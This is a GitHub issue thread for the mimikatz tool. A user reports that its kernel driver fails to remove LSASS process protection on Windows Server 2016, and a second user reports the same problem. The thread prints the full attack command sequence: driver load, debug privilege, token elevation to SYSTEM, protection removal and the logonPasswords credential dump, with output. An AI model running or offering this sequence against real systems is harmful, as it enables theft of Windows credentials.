!processProtect permission changing issue

ToTheFarWest commented 3 years ago

Version info

mimikatz # version

mimikatz 2.2.0 (arch x64)
Windows NT 10.0 build 14393 (arch x64) ## Windows Server 2016 Version 1607
msvc 150030729 207

Issue

Mimikatz with mimidrv is unable to change PS_PROTECTION struct for any process

Reproducing

Open mimikatz.exe as Administrator

mimikatz # !+
[*] 'mimidrv' service not present
[+] 'mimidrv' service successfully registered
[+] 'mimidrv' service ACL to everyone
[+] 'mimidrv' service started

mimikatz # privilege::debug
Privilege '20' OK

mimikatz # token::elevate
Token Id  : 0
User name : 
SID name  : NT AUTHORITY\SYSTEM

688 {0;000003e7} 1 D 31914      NT AUTHORITY\SYSTEM S-1-5-18    (04g,21p)   Primary
 -> Impersonated !
 * Process Token : {0;0003aced} 1 F 408572      CYBER\Student   S-1-5-21-25820147-2451064938-3468183638-1103    (15g,26p)   Primary
 * Thread Token  : {0;000003e7} 1 D 834134      NT AUTHORITY\SYSTEM S-1-5-18    (04g,21p)   Impersonation (Delegation)

mimikatz # !processProtect /process:lsass.exe /remove
Process : lsass.exe
PID 756 -> 00/00 [0-0-0]

mimikatz # sekurlsa::logonPasswords
ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005)

LSASS in Process Explorer LSASS in ProcExp

Trying to elevate Mimikatz.exe to Protected...

mimikatz # !processProtect /process:mimikatz.exe
Process : mimikatz.exe
PID 4268 -> 3f/3f [2-0-6]

mimikatz # sekurlsa::logonPasswords
ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005)

mimikatz.exe in Process Explorer

ToTheFarWest commented 3 years ago

Output of !process also seems broken

mimikatz # !process
4   System          F-Tok   Sig 00/00 [0-0-0]
476 smss.exe        F-Tok   Sig 00/00 [0-0-0]
560 csrss.exe       F-Tok   Sig 00/00 [0-0-0]
624 smss.exe        F-Tok   Sig 00/00 [0-0-0]
632 wininit.exe     F-Tok   Sig 00/00 [0-0-0]
644 csrss.exe       F-Tok   Sig 00/00 [0-0-0]
688 winlogon.exe    F-Tok   Sig 00/00 [0-0-0]
748 services.exe    F-Tok   Sig 00/00 [0-0-0]
756 lsass.exe       F-Tok   Sig 00/00 [0-0-0]
900 svchost.exe     F-Tok   Sig 00/00 [0-0-0]
940 svchost.exe     F-Tok   Sig 00/00 [0-0-0]
464 dwm.exe         F-Tok   Sig 00/00 [0-0-0]
912 svchost.exe     F-Tok   Sig 00/00 [0-0-0]
1016    svchost.exe     F-Tok   Sig 00/00 [0-0-0]
1040    svchost.exe     F-Tok   Sig 00/00 [0-0-0]
1060    svchost.exe     F-Tok   Sig 00/00 [0-0-0]
1108    svchost.exe     F-Tok   Sig 00/00 [0-0-0]
1184    svchost.exe     F-Tok   Sig 00/00 [0-0-0]
1412    svchost.exe     F-Tok   Sig 00/00 [0-0-0]
1592    svchost.exe     F-Tok   Sig 00/00 [0-0-0]
1080    svchost.exe     F-Tok   Sig 00/00 [0-0-0]
1836    spoolsv.exe     F-Tok   Sig 00/00 [0-0-0]
872 Microsoft.Acti  F-Tok   Sig 00/00 [0-0-0]
1760    svchost.exe     F-Tok   Sig 00/00 [0-0-0]
1896    dfsrs.exe       F-Tok   Sig 00/00 [0-0-0]
2076    dns.exe         F-Tok   Sig 00/00 [0-0-0]
2084    svchost.exe     F-Tok   Sig 00/00 [0-0-0]
2092    ismserv.exe     F-Tok   Sig 00/00 [0-0-0]
2120    vmtoolsd.exe    F-Tok   Sig 00/00 [0-0-0]
2128    VGAuthService.  F-Tok   Sig 00/00 [0-0-0]
2152    svchost.exe     F-Tok   Sig 00/00 [0-0-0]
2184    wlms.exe        F-Tok   Sig 00/00 [0-0-0]
2240    dfssvc.exe      F-Tok   Sig 00/00 [0-0-0]
2548    sppsvc.exe      F-Tok   Sig 00/00 [0-0-0]
2656    WmiPrvSE.exe    F-Tok   Sig 00/00 [0-0-0]
2744    vds.exe         F-Tok   Sig 00/00 [0-0-0]
2848    dllhost.exe     F-Tok   Sig 00/00 [0-0-0]
3000    msdtc.exe       F-Tok   Sig 00/00 [0-0-0]
2908    WmiPrvSE.exe    F-Tok   Sig 00/00 [0-0-0]
3092    SppExtComObj.E  F-Tok   Sig 00/00 [0-0-0]
3664    RuntimeBroker.  F-Tok   Sig 00/00 [0-0-0]
3700    svchost.exe     F-Tok   Sig 00/00 [0-0-0]
3708    sihost.exe      F-Tok   Sig 00/00 [0-0-0]
3728    taskhostw.exe   F-Tok   Sig 00/00 [0-0-0]
4000    userinit.exe    F-Tok   Sig 00/00 [0-0-0]
4020    explorer.exe    F-Tok   Sig 00/00 [0-0-0]
3564    ShellExperienc  F-Tok   Sig 00/00 [0-0-0]
3536    SearchUI.exe    F-Tok   Sig 00/00 [0-0-0]
4340    ServerManager.  F-Tok   Sig 00/00 [0-0-0]
4388    GoogleCrashHan  F-Tok   Sig 00/00 [0-0-0]
4428    GoogleCrashHan  F-Tok   Sig 00/00 [0-0-0]
5000    vm3dservice.ex  F-Tok   Sig 00/00 [0-0-0]
5012    vmtoolsd.exe    F-Tok   Sig 00/00 [0-0-0]
4268    mimikatz.exe    F-Tok   Sig 3f/3f [2-0-6]
4288    conhost.exe     F-Tok   Sig 00/00 [0-0-0]
4540    wermgr.exe      F-Tok   Sig 00/00 [0-0-0]
2724    procexp.exe     F-Tok   Sig 00/00 [0-0-0]
4304    PROCEXP64.exe   F-Tok   Sig 00/00 [0-0-0]

ryuke-acker commented 1 year ago

Hey, I'm getting the same issue exact same version. Did you ever find a solution?

gentilkiwi / mimikatz

!processProtect permission changing issue #352

Version info

Issue

Reproducing